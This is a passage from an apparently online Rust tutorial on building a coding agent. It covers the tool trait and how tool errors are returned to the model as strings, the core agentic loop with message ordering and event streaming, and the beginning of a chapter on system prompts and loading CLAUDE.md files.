  • Every caller knows the concrete implementation at compile time. A struct like SimpleAgent<P: Provider> monomorphises once per provider.
  • Throughput matters enough that you care about avoiding one boxed-future allocation per call.
  • The trait has lots of async methods and you do not want async_trait to insert a Box around each one.

For this book, every trait we define happens to fall cleanly on one side: Provider / StreamProvider / SafetyCheck are monomorphised through generic parameters (RPITIT); Tool / HookHandler / InputHandler get stored as Box<dyn _> in a heterogeneous collection (#[async_trait]). When you add a new trait in your own extensions, walk the question above and you will not have to think about it again.

Why tool errors never terminate the agent

A tool failure is not an agent failure. If the LLM asks to read a file that does not exist, the right behaviour is to tell it "error: file not found" and let it recover -- try a different path, ask the user, or move on. A genuine Err(...) escaping to the top of the agent loop would instead terminate the conversation, which is almost never what we want.

We get that behaviour by agreement between the Tool impl and the agent loop:

  1. Tools return anyhow::Result<String>. On failure they use bail!("reason") or ?-propagation (context.read_to_string(...).with_context(|| ...)?). You will see bail! used heavily in the file tools in Chapter 9.
  2. The agent loop catches tool errors with .unwrap_or_else(|e| format!("error: {e}")) before packaging the result into a Message::ToolResult. The LLM always receives a string -- either the tool's success output or the formatted error.

So from inside a tool you write idiomatic Rust (?, bail!, anyhow::Context); from the LLM's side every outcome looks like a string. The only failures that do escape the agent loop are genuinely unrecoverable ones -- network failure talking to the provider, a serialization bug, a panic -- none of which a tool implementation should produce on its own.
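The boundary is easy to see with std types alone. This sketch uses plain std::io::Error instead of the starter's anyhow::Result<String>, but the conversion at the agent-loop side is identical:

```rust
use std::fs;

// Tool side: idiomatic Result-returning code. A missing file is an Err here.
fn read_tool(path: &str) -> Result<String, std::io::Error> {
    fs::read_to_string(path)
}

fn main() {
    // Agent-loop side: the Err never escapes -- it becomes a string the LLM reads.
    let result = read_tool("definitely/not/here.txt")
        .unwrap_or_else(|e| format!("error: {e}"));
    assert!(result.starts_with("error:"));
    println!("{result}");
}
```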

You will see one small variation in Chapter 14: SafeToolWrapper catches its safety-check errors and returns Ok("error: safety check failed: ...") directly, rather than letting them propagate. This is equivalent (the agent loop would have formatted the Err the same way), but keeps the wrapper's error-handling self-contained when it is acting as a pre-filter.

Hands-on: building an EchoTool

Time to implement your first concrete tool. We will build a minimal EchoTool that takes a text argument and returns it unchanged. This covers the full lifecycle: defining a schema, implementing the trait, and registering with a ToolSet.

Step 1: the struct and definition

#![allow(unused)]
fn main() {
struct EchoTool {
    def: ToolDefinition,
}

impl EchoTool {
    fn new() -> Self {
        Self {
            def: ToolDefinition::new("echo", "Echo the input")
                .param("text", "string", "Text to echo", true),
        }
    }
}
}

The ToolDefinition is built once in the constructor and stored as a field. The schema tells the LLM: "this tool is called echo, it takes a required string parameter called text."

Step 2: implement the Tool trait

#![allow(unused)]
fn main() {
#[async_trait::async_trait]
impl Tool for EchoTool {
    fn definition(&self) -> &ToolDefinition {
        &self.def
    }

    async fn call(&self, args: Value) -> anyhow::Result<String> {
        let text = args["text"].as_str().unwrap_or("(no text)");
        Ok(text.to_string())
    }
}
}

A few things to note:

  • definition() returns a reference to the stored ToolDefinition.
  • call() indexes into the JSON args to extract text. If the key is missing or not a string, we fall back to "(no text)" rather than panicking. Always be defensive with LLM-provided arguments.
  • call() returns anyhow::Result<String> -- just a plain string, not a ToolResult struct. The starter keeps tool output simple.
  • There are only two required methods. No safety flags, no validation, no summary -- the starter's Tool trait is minimal.

Step 3: register and use

#![allow(unused)]
fn main() {
let tools = ToolSet::new().with(EchoTool::new());

// The agent loop would do this:
let defs = tools.definitions();
// ... send defs to LLM, get back a ToolCall ...

let tool = tools.get("echo").unwrap();
let result = tool.call(serde_json::json!({"text": "hello"})).await?;
assert_eq!(result, "hello");
}

That is the full round-trip. Definition goes to the LLM, the LLM produces a ToolCall, we look up the tool by name, call it, and feed the result back.

The minimal trait

The starter's Tool trait has exactly two required methods:

Method          Purpose
definition()    Return the tool's JSON Schema description
call()          Execute the tool and return a string result

There are no default methods, no safety flags, no validation hooks. This is intentional -- the starter keeps things simple so you can focus on the agent loop mechanics. Claude Code's real tool system adds is_read_only(), is_destructive(), validate_input(), and more, but those are not needed to build a working agent.

How this compares to Claude Code

Claude Code's tool system is substantially larger:

  • 40+ tools spanning file operations, git, search, browser, notebook, MCP, and more. We build 5.
  • Zod schemas provide runtime validation with TypeScript type inference. We use serde_json::Value with a builder.
  • React rendering -- tools can return React elements that render rich terminal UI (diffs, tables, progress bars). We return plain strings.
  • Progress events -- tools emit typed progress events during execution. We have activity_description() for a simple spinner.
  • Tool groups and permissions -- tools are organized into permission groups with allow/deny lists. We will build our permission system in Chapter 13, but it will be simpler.
  • Cost hints -- tools can declare estimated token costs to help the context manager. Our TokenUsage type from Chapter 4 tracks tokens at the message level, but we do not carry cost hints on individual tools.

Despite these differences, the core protocol is identical. An LLM sees a list of tool schemas, decides to call one, the agent executes it, and the result goes back to the LLM. Everything else -- validation, permissions, progress, rendering -- is orchestration around that loop. Understanding the Tool trait gives you the foundation to understand Claude Code's full system.

Implementation note

There is no new source file to create in this chapter. The EchoTool exists only in the test file (src/tests/ch3.rs). Your job is to verify that the types you built in Chapter 4 -- Tool, ToolDefinition, ToolSet -- work correctly with a concrete tool implementation. If the test_read_ tests pass, your type definitions are correct.

Run the tests

cargo test -p mini-claw-code-starter test_read_

What the tests verify

  • test_read_read_definition -- the ReadTool produces the correct name and a non-empty description from its ToolDefinition, and the "path" parameter is required
  • test_read_read_file -- calling with a valid path returns the file's content, verifying argument extraction and return value
  • test_read_read_missing_file -- calling with a nonexistent path returns an error
  • test_read_read_missing_arg -- calling with no arguments returns an error

Key takeaway

The Tool trait is deliberately minimal -- just definition() and call(). This simplicity means every tool, from a trivial echo to a complex bash executor, implements the same two-method interface. The agent loop does not need to know what a tool does; it only needs to look it up by name and call it.

Summary

This chapter focused on the why behind the tool types you defined in Chapter 4:

  • #[async_trait] vs RPITIT -- the critical distinction. Tools need object safety for heterogeneous storage; providers need zero-cost generics. The two-strategy approach gives you both.
  • Errors are values -- tool failures reach the model as "error: ..." result strings instead of Err(...) escaping the loop. The agent loop continues. The model adapts.
  • EchoTool -- your first concrete tool, demonstrating the full lifecycle: schema definition, trait implementation, registration, execution.

In the next chapter we build the SimpleAgent -- the loop that ties providers and tools together into a functioning agent.

Check yourself


← Chapter 5b: OpenRouter & StreamingAgent · Contents · Chapter 7: The Agentic Loop (Deep Dive) →

Chapter 7: The Agentic Loop (Deep Dive)

File(s) to edit: src/agent.rs — only the run_with_history stub is new in this chapter. single_turn, execute_tools, and chat were implemented back in Chapter 3; this chapter is a deep-dive walkthrough of the loop you already built, plus a thin new event-emitting variant. Tests to run: the same Chapter 3 tests still apply (cargo test -p mini-claw-code-starter test_single_turn_, cargo test -p mini-claw-code-starter test_simple_agent_); there is no dedicated test in the starter for run_with_history — verify it manually by running the example in Chapter 5b and watching the event stream. Estimated time: 45 min

Goal

  • Revisit SimpleAgent::chat from Chapter 3 with a careful walk-through of the control flow, the message ordering, and the edge cases. You are not reimplementing it -- you are understanding what you already wrote.
  • Revisit execute_tools and make sure you know why tool errors become result strings rather than propagating -- the rationale links back to the agreement explained in Chapter 6.
  • Implement the one new piece: run_with_history, an event-emitting variant of the main loop that sends an AgentEvent after every turn so a UI layer (built in later chapters) can observe progress.
  • Understand message ordering: why Message::Assistant must be pushed before the matching Message::ToolResult values.

This is the chapter where everything clicks.

In the previous chapters you built the vocabulary (messages), the mouth (provider), and the hands (tools). Now you build the brain -- the loop that ties them all together. The SimpleAgent is the heart of a coding agent. It is the thing that takes a user prompt, talks to an LLM, executes tools, feeds results back, and keeps going until the job is done.

Every coding agent -- Claude Code, Cursor, Aider, OpenCode -- has some version of this loop. The details vary (streaming, permissions, compaction), but the skeleton is identical. Get this right and you have a working agent. Everything else in this book is refinement.

What the SimpleAgent does

Here is the entire agent lifecycle in one sentence: prompt the LLM, check if it wants to use tools, execute those tools, send the results back, repeat until the LLM says it is done.

That is it. The SimpleAgent implements this loop. It owns three things:

  1. A provider -- the LLM backend (from Chapter 5a / 5b)
  2. A tool set -- the registered tools (from Chapter 6)
  3. A config -- safety limits and behavior knobs
flowchart TD
    A[User prompt] --> B[SimpleAgent::chat]
    B --> C[Provider.chat]
    C --> D{StopReason?}
    D -->|Stop| E[Return final text]
    D -->|ToolUse| F[execute_tools]
    F --> G[Push Message::Assistant]
    G --> H[Push Message::ToolResult for each result]
    H --> C

If you have read Claude Code's source, this maps to the query engine and the query function. Our version strips away streaming, permissions, hooks, and compaction -- those come in later chapters -- leaving the pure control flow.

The SimpleAgent struct

The starter's SimpleAgent is leaner than a production engine -- no config struct, no max turns, no truncation. Just a provider and tools:

#![allow(unused)]
fn main() {
pub struct SimpleAgent<P: Provider> {
    provider: P,
    tools: ToolSet,
}
}

Generic over P: Provider, so the same agent works with OpenRouterProvider in production and MockProvider in tests. The builder pattern lets you configure it fluently:

#![allow(unused)]
fn main() {
let agent = SimpleAgent::new(provider)
    .tool(BashTool::new())
    .tool(ReadTool::new())
    .tool(WriteTool::new());
}

No surprises. The interesting part is the methods that actually run.

execute_tools: the tool dispatch helper

Before tackling the main loop, we need a helper that takes a slice of ToolCalls from the LLM and produces results. This is execute_tools:

#![allow(unused)]
fn main() {
async fn execute_tools(&self, calls: &[ToolCall]) -> Vec<(String, String)> {
    let mut results = Vec::with_capacity(calls.len());
    for call in calls {
        let result = match self.tools.get(&call.name) {
            Some(t) => {
                t.call(call.arguments.clone())
                    .await
                    .unwrap_or_else(|e| format!("error: {e}"))
            }
            None => format!("error: unknown tool `{}`", call.name),
        };
        results.push((call.id.clone(), result));
    }
    results
}
}

Two stages:

  1. Tool lookup -- If the LLM hallucinates a tool name that does not exist, we return an error string. The model sees "error: unknown tool `foo`" and can recover. This happens more than you might expect, especially with smaller models.

  2. Execute -- Run the tool. If it fails, .unwrap_or_else(|e| format!("error: {e}")) converts the error to a string the model can read.

Note the return type: Vec<(String, String)> -- pairs of (call ID, result string). No ToolResult struct, no truncation, no validation. The starter keeps this simple.

This is a key design decision: tool errors become results, not panics. The agent loop never crashes because a tool failed. The model reads the error, adjusts its approach, and tries again.
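The same two stages can be exercised in a synchronous, std-only sketch. Function pointers stand in for the starter's Box<dyn Tool> values; the names here are illustrative:

```rust
use std::collections::HashMap;

// Synchronous sketch of execute_tools' two stages: lookup, then run-and-catch.
type ToolFn = fn(&str) -> Result<String, String>;

fn dispatch(tools: &HashMap<&str, ToolFn>, name: &str, args: &str) -> String {
    match tools.get(name) {
        // Stage 2: execute, converting any Err into a readable result string.
        Some(t) => t(args).unwrap_or_else(|e| format!("error: {e}")),
        // Stage 1: unknown tool name -> error string, never a panic.
        None => format!("error: unknown tool `{name}`"),
    }
}

fn main() {
    let mut tools: HashMap<&str, ToolFn> = HashMap::new();
    tools.insert("echo", |args| Ok(args.to_string()));
    tools.insert("fail", |_| Err("disk on fire".to_string()));

    assert_eq!(dispatch(&tools, "echo", "hi"), "hi");
    assert_eq!(dispatch(&tools, "fail", ""), "error: disk on fire");
    assert_eq!(dispatch(&tools, "nope", ""), "error: unknown tool `nope`");
}
```

All three outcomes -- success, failure, hallucinated name -- come back as plain strings, which is exactly the contract the LLM-facing side relies on.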

The chat() method: the core loop

This is it. The agentic loop. Read it carefully -- it is shorter than you expect.

#![allow(unused)]
fn main() {
pub async fn chat(&self, messages: &mut Vec<Message>) -> anyhow::Result<String> {
    let defs = self.tools.definitions();

    loop {
        let turn = self.provider.chat(messages, &defs).await?;

        match turn.stop_reason {
            StopReason::Stop => {
                let text = turn.text.clone().unwrap_or_default();
                messages.push(Message::Assistant(turn));
                return Ok(text);
            }
            StopReason::ToolUse => {
                let results = self.execute_tools(&turn.tool_calls).await;
                messages.push(Message::Assistant(turn));
                for (id, content) in results {
                    messages.push(Message::ToolResult { id, content });
                }
            }
        }
    }
}
}

Let's break it down.

Tool definitions: collected once

#![allow(unused)]
fn main() {
let defs = self.tools.definitions();
}

We gather tool definitions outside the loop. They do not change between iterations -- the tool set is fixed for the lifetime of the agent. Every call to provider.chat() includes these definitions so the LLM knows which tools are available.

Call the provider

#![allow(unused)]
fn main() {
let turn = self.provider.chat(messages, &defs).await?;
}

Send the full message history and tool definitions to the LLM. The ? propagates provider errors (network failure, auth error, rate limit) directly to the caller. Provider errors are not recoverable by the agent loop -- they need human intervention.

Match the stop reason

#![allow(unused)]
fn main() {
match turn.stop_reason {
    StopReason::Stop => { /* final answer */ }
    StopReason::ToolUse => { /* tool dispatch */ }
}
}

The LLM tells us why it stopped generating. Two possibilities:

  • Stop -- The model is done. It has a final text answer. Extract it, push the assistant message into history, return.
  • ToolUse -- The model wants to use tools. It has populated tool_calls with one or more calls. Execute them, push results, loop.

The two branches

StopReason::Stop -- Clone the text, push the assistant message into history, return. The conversation ends with an Assistant message, ready for the next user turn.

StopReason::ToolUse -- Execute the tools, then push messages in this exact order:

  1. First, Message::Assistant(turn) -- the assistant's response including its tool calls
  2. Then, Message::ToolResult { id, content } for each tool result

This ordering matters. The LLM API expects tool results to follow the assistant message that requested them. Each ToolResult is linked to its ToolCall by the id field. If you push them in the wrong order, the provider will reject the request.

After pushing results, the loop continues. The next iteration sends the entire history -- including the tool calls and their results -- back to the LLM. The model sees what happened and decides what to do next.

Rust concept: ownership and &mut Vec<Message>

The caller owns the message history and passes it as &mut Vec<Message>. The agent borrows the history mutably for the duration of the call; ownership stays with the caller. The alternative -- the agent owning the Vec -- would mean the caller could not inspect the history after the call, and multi-turn conversations would require moving the Vec in and out of the agent. With &mut, the agent pushes messages into the caller's vec and the caller retains full control afterward.

Keeping ownership with the caller buys three things:

  1. Multi-turn conversations -- The caller can push a new Message::User(...) and call chat() again. The agent picks up where it left off with the full context.
  2. Inspection -- After chat() returns, the caller can examine the full message history to see every tool call, every result, every intermediate step.
  3. Persistence -- The caller can serialize the messages to disk for session save/resume.
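The ownership pattern can be demonstrated with a toy stand-in. The Message enum and chat function below are illustrative, not the starter's types -- only the &mut borrow is the point:

```rust
// Toy stand-in for the starter's types, just to show the &mut pattern.
#[derive(Debug, PartialEq)]
enum Message {
    User(String),
    Assistant(String),
}

// A fake "agent": borrows the history mutably and appends its reply.
fn chat(messages: &mut Vec<Message>) -> String {
    let reply = format!("reply after {} messages", messages.len());
    messages.push(Message::Assistant(reply.clone()));
    reply
}

fn main() {
    let mut history = vec![Message::User("first".into())];
    chat(&mut history);

    // Caller still owns the history: inspect it, then continue the conversation.
    assert!(matches!(history[0], Message::User(_)));
    history.push(Message::User("second".into()));
    chat(&mut history);

    assert_eq!(history.len(), 4); // User, Assistant, User, Assistant
}
```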

run(): the convenience wrapper

Most of the time you just want to send a prompt and get a response. That is run():

#![allow(unused)]
fn main() {
pub async fn run(&self, prompt: &str) -> anyhow::Result<String> {
    let mut messages = vec![Message::User(prompt.to_string())];
    self.chat(&mut messages).await
}
}

Two lines. Creates a fresh message history with the user prompt, delegates to chat(). The message history is discarded after the call -- use chat() directly if you need to preserve it.

AgentEvent: making it observable

The chat() method returns when the agent is done. That is fine for tests, but a real UI needs to show progress while the loop is running. What tool is being called? How long has it been running? Is it done?

The AgentEvent enum models these updates:

#![allow(unused)]
fn main() {
#[derive(Debug)]
pub enum AgentEvent {
    /// A chunk of text streamed from the LLM (streaming mode only).
    TextDelta(String),
    /// A tool is being called.
    ToolCall { name: String, summary: String },
    /// The agent finished with a final response.
    Done(String),
    /// The agent encountered an error.
    Error(String),
}
}

Four variants covering the lifecycle:

Event       When                        UI use
TextDelta   LLM streams a text chunk    Append to terminal output
ToolCall    A tool is being called      Show "[bash: ls -la]"
Done        Agent loop finished         Display final answer
Error       Unrecoverable error         Show error message

Note: the starter combines ToolStart/ToolEnd into a single ToolCall event. The summary field is generated by the tool_summary() helper in src/agent.rs, which looks for common argument keys (command, path, question) and formats them like [bash: ls -la].

run_with_events / run_with_history

These methods duplicate the core loop logic but emit events through a tokio::sync::mpsc::UnboundedSender<AgentEvent> channel. The caller creates the channel, passes the sender, and consumes events from the receiver -- typically in a separate task that drives the UI.

#![allow(unused)]
fn main() {
pub async fn run_with_events(
    &self,
    prompt: &str,
    events: mpsc::UnboundedSender<AgentEvent>,
) {
    let messages = vec![Message::User(prompt.to_string())];
    self.run_with_history(messages, events).await;
}
}

run_with_history has the same structure as chat() but with events woven in. It takes ownership of the messages vec and returns the full history. Errors are sent as AgentEvent::Error rather than propagated.

The key differences from chat():

  1. Provider errors are caught with match instead of ?, and sent as AgentEvent::Error.
  2. ToolCall events fire for each tool call, using the tool_summary() helper to produce a one-line description.
  3. Done event fires before pushing the final assistant message, so the UI gets the text immediately.

Note the let _ = events.send(...) pattern. The send can fail if the receiver has been dropped (the UI task crashed or exited early). We ignore the error because the agent should finish its work regardless of whether anyone is watching.
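You can see the same failure mode with std's channel. The starter uses tokio::sync::mpsc, but the dropped-receiver semantics match:

```rust
use std::sync::mpsc;

fn main() {
    let (tx, rx) = mpsc::channel::<String>();
    drop(rx); // the UI task exited early

    // send() now returns Err(SendError); the agent shrugs and keeps working.
    let result = tx.send("Done".to_string());
    assert!(result.is_err());
    let _ = tx.send("still fine".to_string()); // the `let _ =` pattern
}
```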

Using events in practice

The caller creates an unbounded channel, passes the sender to the agent, and reads events from the receiver -- typically in a separate task:

#![allow(unused)]
fn main() {
let (tx, mut rx) = tokio::sync::mpsc::unbounded_channel();

let agent_handle = tokio::spawn(async move {
    agent.run_with_events("Fix the bug in main.rs", tx).await
});

while let Some(event) = rx.recv().await {
    match event {
        AgentEvent::ToolCall { summary, .. } => println!("{summary}"),
        AgentEvent::Done(text) => { println!("{text}"); break; }
        AgentEvent::Error(e) => { eprintln!("Error: {e}"); break; }
        _ => {}
    }
}
}

This two-task pattern is what a TUI builds on. The UI task renders events; the agent task runs the loop. They communicate through the channel.

Error handling philosophy

The agent has two distinct error strategies, and the boundary between them is intentional.

Tool errors become results

When a tool fails -- execution error, unknown tool -- the error becomes a string result that the model sees as a normal tool result. The loop continues. The model reads the error and adapts.

Tool error flow:
  LLM requests bash("some_command")
  -> Tool returns Err(e)
  -> unwrap_or_else converts to "error: {e}"
  -> Pushed as Message::ToolResult { id, content: "error: ..." }
  -> LLM sees error, tries different approach

This is essential for robust agents. Models make mistakes. Tools fail for legitimate reasons. The agent should recover, not crash.

Provider errors propagate

When the provider fails -- network timeout, authentication error, rate limit, malformed response -- the error propagates up via ? (in chat()) or via AgentEvent::Error (in run_with_history()). The loop stops.

Provider error flow:
  Agent calls provider.chat()
  -> Provider returns Err(network timeout)
  -> chat() returns Err(network timeout)
  -> Caller handles it (retry, show error, etc.)

Provider errors are not the agent's problem. They need human or system-level intervention (check your API key, wait for rate limits, fix your network). The agent does not try to recover.

Message history management

The order in which messages are pushed into the history is load-bearing. After a tool-use turn:

#![allow(unused)]
fn main() {
StopReason::ToolUse => {
    let results = self.execute_tools(&turn.tool_calls).await;
    messages.push(Message::Assistant(turn));    // 1. Assistant message (with tool_calls)
    for (id, content) in results {
        messages.push(Message::ToolResult { id, content });  // 2. Tool results
    }
}
}

The resulting message sequence looks like:

[User]        "What files are in src/?"
[Assistant]   tool_calls: [bash("ls src/")]      <- includes the tool call
[ToolResult]  "main.rs\nlib.rs\n"                <- linked by call ID
[Assistant]   "There are two files: ..."          <- next LLM response

Why this order?

  1. API requirement: The Claude API (and OpenAI-compatible APIs) requires that tool_result messages immediately follow the assistant message that generated the corresponding tool_use. Violating this causes a 400 error.

  2. ID linking: Each Message::ToolResult has an id that matches a ToolCall.id in the preceding assistant message. The LLM uses this to associate results with requests when there are multiple parallel tool calls.

  3. Context for the next turn: The LLM needs to see its own tool calls to understand what it asked for, and the results to know what happened. Both must be present in the history for the next provider.chat() call.
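The ordering and ID-linking rules can be checked mechanically. The types below are a toy, not the starter's definitions -- the invariant they encode is the one the API enforces:

```rust
// Toy types for checking the invariant: every ToolResult id must match a
// ToolCall id in the immediately preceding Assistant message.
struct ToolCall { id: String }

enum Message {
    Assistant { tool_calls: Vec<ToolCall> },
    ToolResult { id: String },
}

fn results_follow_calls(history: &[Message]) -> bool {
    let mut pending: Vec<&str> = Vec::new();
    for msg in history {
        match msg {
            Message::Assistant { tool_calls } => {
                pending = tool_calls.iter().map(|c| c.id.as_str()).collect();
            }
            Message::ToolResult { id } => {
                if !pending.contains(&id.as_str()) {
                    return false;
                }
            }
        }
    }
    true
}

fn main() {
    let ok = vec![
        Message::Assistant { tool_calls: vec![ToolCall { id: "call_1".into() }] },
        Message::ToolResult { id: "call_1".into() },
    ];
    assert!(results_follow_calls(&ok));

    // A result with no preceding call is exactly what triggers a 400.
    let orphan = vec![Message::ToolResult { id: "call_1".into() }];
    assert!(!results_follow_calls(&orphan));
    println!("ordering invariant holds");
}
```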

Putting it all together: a complete trace

Let's trace through a realistic scenario. The user asks: "What is 2 + 3?"

The agent has an AddTool registered. The mock provider is configured to return a tool call first, then a final answer.

Turn 0:

messages: [User("What is 2 + 3?")]
  -> provider.chat() returns: ToolUse, tool_calls: [add(a=2, b=3)]
  -> execute_tools: AddTool.call({a:2, b:3}) -> Ok("5")
  -> push: Assistant(tool_calls: [add(a=2, b=3)])
  -> push: ToolResult { id: "call_1", content: "5" }

Turn 1:

messages: [User, Assistant, ToolResult]
  -> provider.chat() returns: Stop, text: "The sum is 5"
  -> push: Assistant(text: "The sum is 5")
  -> return Ok("The sum is 5")

Two provider calls, one tool execution, clean exit. The final message history has 4 entries: User, Assistant (with tool call), ToolResult, Assistant (with text).

How this compares to Claude Code

Our SimpleAgent is a teaching implementation. Claude Code's real agent is considerably more complex. Here is what it adds:

Feature          Our agent                     Claude Code
Core loop        loop { match stop_reason }    Same pattern, with async hooks at every stage
Streaming        Separate run_with_events      Integrated SSE streaming with StreamProvider
Permissions      None                          Full permission pipeline before every tool call
Max turns        None                          Configurable ceiling on loop iterations
Truncation       None                          Tool result size limits
Compaction       None                          Auto-compacts when approaching the token limit
Hooks            None                          Pre/post tool hooks with shell command execution
Concurrency      Sequential tool execution     Parallel execution for safe tools
Error recovery   Tool errors as results        Same, plus retries for transient provider errors

The good news: the architecture is the same. Every feature in the right column plugs into the same loop structure. Permissions are checked in execute_tools before calling t.call(). Compaction runs at the top of the loop when token count is high. Hooks fire around tool execution.

Tests

Run the tests to verify your implementation:

cargo test -p mini-claw-code-starter test_single_turn_  # single_turn tests
cargo test -p mini-claw-code-starter test_simple_agent_  # SimpleAgent tests

What the tests verify

Single-turn tests (test_single_turn_):

  • test_single_turn_direct_response -- provider returns text with StopReason::Stop; verifies the agent returns that text directly
  • test_single_turn_one_tool_call -- provider returns a tool call then a final answer; verifies the agent executes the tool and returns the final text
  • test_single_turn_unknown_tool -- provider requests a tool that is not registered; verifies the agent returns an error string (not a panic) and the loop continues

SimpleAgent tests (test_simple_agent_):

  • test_simple_agent_text_response -- run() with a provider that returns text; verifies the response string
  • test_simple_agent_single_tool_call -- provider scripts a tool call followed by a final answer; verifies the agent loops correctly and returns the final text
  • test_simple_agent_unknown_tool -- provider requests a tool that is not registered; verifies the agent returns an error string (not a panic) and the loop continues
  • test_simple_agent_multi_step_loop -- provider scripts two tool calls then a final answer; verifies the agent loops correctly through multiple tool rounds

Implementation checklist

Open src/agent.rs in the starter. You will see unimplemented!() stubs with doc comments for each method. Here is what to fill in:

  1. SimpleAgent::new -- Initialize with the provider and an empty ToolSet.

  2. SimpleAgent::tool -- Push the tool into self.tools, return self.

  3. execute_tools -- Look up each tool, execute, catch errors. Return Vec<(String, String)>.

  4. chat -- The core loop. Call provider, match stop reason, dispatch tools, push messages, loop.

  5. run -- Create messages with Message::User(prompt), delegate to chat.

  6. run_with_history -- Same loop as chat, but emits AgentEvents through a channel. Report errors as events instead of propagating them with ?.

  7. run_with_events -- Create messages, delegate to run_with_history.

Start with new and tool. Then implement execute_tools -- you can test it implicitly through run. Then chat, then run. Save the event methods for last.
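If you want a feel for execute_tools' shape before writing the real thing, here is a deliberately simplified, synchronous sketch with hypothetical types (plain function pointers in a HashMap instead of the starter's async ToolSet). It shows the one invariant that matters: unknown tools and tool failures both become result strings, never early returns.

```rust
use std::collections::HashMap;

// Simplified sketch: look up each requested tool, run it, and convert
// both "unknown tool" and tool failures into result strings.
fn execute_tools(
    tools: &HashMap<&str, fn(&str) -> Result<String, String>>,
    calls: &[(&str, &str, &str)], // (call_id, tool_name, args)
) -> Vec<(String, String)> {
    calls
        .iter()
        .map(|(id, name, args)| {
            let output = match tools.get(name) {
                Some(f) => f(args).unwrap_or_else(|e| format!("error: {e}")),
                None => format!("error: unknown tool '{name}'"),
            };
            (id.to_string(), output)
        })
        .collect()
}

fn main() {
    let mut tools: HashMap<&str, fn(&str) -> Result<String, String>> = HashMap::new();
    tools.insert("add", |_args| Ok("5".to_string()));
    let out = execute_tools(&tools, &[("call_1", "add", "{}"), ("call_2", "nope", "{}")]);
    assert_eq!(out[0].1, "5");
    assert!(out[1].1.starts_with("error: unknown tool"));
}
```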

Key takeaway

The agentic loop is surprisingly small -- a loop, a match on StopReason, and a helper that dispatches tool calls. Every feature a production agent adds (permissions, streaming, compaction, hooks) plugs into this same skeleton. If you understand chat(), you understand the architecture of every coding agent.

What you have now

After this chapter, you have a working coding agent. Not a complete one -- it has no real tools yet (those come in later chapters) -- but the core loop is done. You can register any tool that implements the Tool trait, point it at any provider that implements Provider, and the agent will autonomously loop until it has an answer.

This is the skeleton that everything else hangs on. Every feature you add later -- real tools like Bash and Read, permissions, streaming -- plugs into the loop you just built.

Check yourself


← Chapter 6: Tool Interface · Contents · Chapter 8: System Prompt →

Chapter 8: System Prompt

File(s) to edit: src/instructions.rs
Test to run: cargo test -p mini-claw-code-starter instructions (InstructionLoader)
Estimated time: 25 min

Every LLM-based agent starts with a system prompt -- an invisible preamble that shapes every response the model produces. A sloppy prompt gives you a chatbot. A carefully engineered prompt gives you a coding agent that follows safety rules, uses tools correctly, and adapts to the project it is working in.

Claude Code's system prompt is over 900 lines of assembled text. It is not written as a single string. It is built from modular sections -- identity, safety rules, tool schemas, environment info, project instructions -- stitched together by a builder at startup. Some sections never change between sessions (tool schemas, core instructions). Others change every time (working directory, git status, CLAUDE.md contents). This distinction is not cosmetic. It is the foundation of prompt caching, an optimization that can cut costs and latency dramatically.

In this chapter you will build the InstructionLoader -- the component that discovers project-specific CLAUDE.md files by walking up the filesystem. We will also discuss system prompt architecture concepts (sections, static/dynamic splitting, prompt caching) that production agents like Claude Code use. Our starter focuses on the instruction loading piece, which is the most practically useful part.

Goal

Implement InstructionLoader in src/instructions.rs so that:

  1. InstructionLoader walks up the filesystem to discover and load CLAUDE.md files.
  2. load() concatenates discovered files into a single string with headers.
  3. system_prompt_section() wraps the loaded instructions for inclusion in a system prompt.

How instruction loading works

flowchart TD
    A[InstructionLoader::discover] -->|walks upward| B["/home/user/CLAUDE.md"]
    A -->|walks upward| C["/home/user/project/CLAUDE.md"]
    A -->|starts here| D["/home/user/project/backend/CLAUDE.md"]
    B --> E[Reverse to root-first order]
    C --> E
    D --> E
    E --> F[InstructionLoader::load]
    F -->|concatenates with headers| G[Combined instructions string]
    G --> H[system_prompt_section]
    H --> I[Ready for system prompt]

Why system prompts matter for agents

A vanilla LLM is a text completer. It has no idea it can run bash commands, read files, or edit code -- unless you tell it. The system prompt is where you tell it.

For a coding agent, the system prompt must do several things:

  • Identity: "You are a coding agent with access to tools." Without this, the model may refuse tool calls or behave like a generic assistant.
  • Safety: "Do not delete files outside the working directory. Do not introduce security vulnerabilities." Safety rules constrain what the model will attempt.
  • Tool schemas: The JSON schema definitions for every available tool. The model needs these to know how to call tools -- what parameters they accept, which are required, what types they expect.
  • Environment: The working directory, OS, shell, git status. This context prevents the model from guessing about the environment.
  • Project instructions: Contents of CLAUDE.md files that tell the model about project conventions, preferred patterns, and things to avoid.

Claude Code assembles all of these into a single system prompt before each conversation. Sections are ordered deliberately, and a cache boundary separates the parts that change from the parts that do not.

Concepts: sections and cache boundaries

Before diving into the code, let's understand how production agents like Claude Code structure their system prompts. These concepts inform the design even though our starter takes a simpler approach.

Prompt sections

A production system prompt is built from modular sections -- identity, safety rules, tool schemas, environment info, project instructions. Each section is a named chunk of text that renders as:

# identity
You are a coding agent. You help users with software engineering tasks
using the tools available to you.

The heading helps the LLM parse the prompt structure and makes debugging easier when you inspect the assembled prompt.

Static vs. dynamic: the cache boundary

LLM API calls are expensive. Every token in the system prompt is processed on every request. Claude's prompt caching feature lets you mark a prefix of the prompt as cacheable -- the API processes it once, caches the internal state, and reuses it on subsequent requests. This can reduce latency by up to 85% and cost by up to 90% for long prompts.

But caching only works for a prefix. If any byte in the cached prefix changes, the cache is invalidated. This means you need to put the stable parts first and the changing parts last:

+---------------------------------------+
| Static sections (cacheable)           |
|  - Identity                           |
|  - Safety instructions                |
|  - Tool schemas                       |
|                                       |
|  [these rarely change]                |
+-------- CACHE BOUNDARY ---------------+
| Dynamic sections (per-session)        |
|  - Working directory                  |
|  - Git status                         |
|  - CLAUDE.md instructions             |
|  - Custom user instructions           |
|                                       |
|  [these change every session]         |
+---------------------------------------+

Claude Code calls this boundary SYSTEM_PROMPT_DYNAMIC_BOUNDARY. Everything above it is sent with a cache control header. Everything below it is fresh on each request.

A production agent would implement a SystemPromptBuilder that maintains separate lists of static and dynamic sections, renders each half independently, and supports cache-aware providers. These types (SystemPromptBuilder, PromptSection) are conceptual in this chapter -- the starter does not include them. Instead, the starter implements InstructionLoader in src/instructions.rs, which is the most practically useful component to build from scratch.

InstructionLoader: discovering CLAUDE.md

Claude Code loads project-specific instructions from CLAUDE.md files. These files let users customize the agent's behavior per project -- preferred coding style, test commands, things to avoid. The agent discovers them by walking up the filesystem from the current working directory.

Open src/instructions.rs. Here is the starter stub:

pub struct InstructionLoader {
    file_names: Vec<String>,
}

impl InstructionLoader {
    pub fn new(file_names: &[&str]) -> Self {
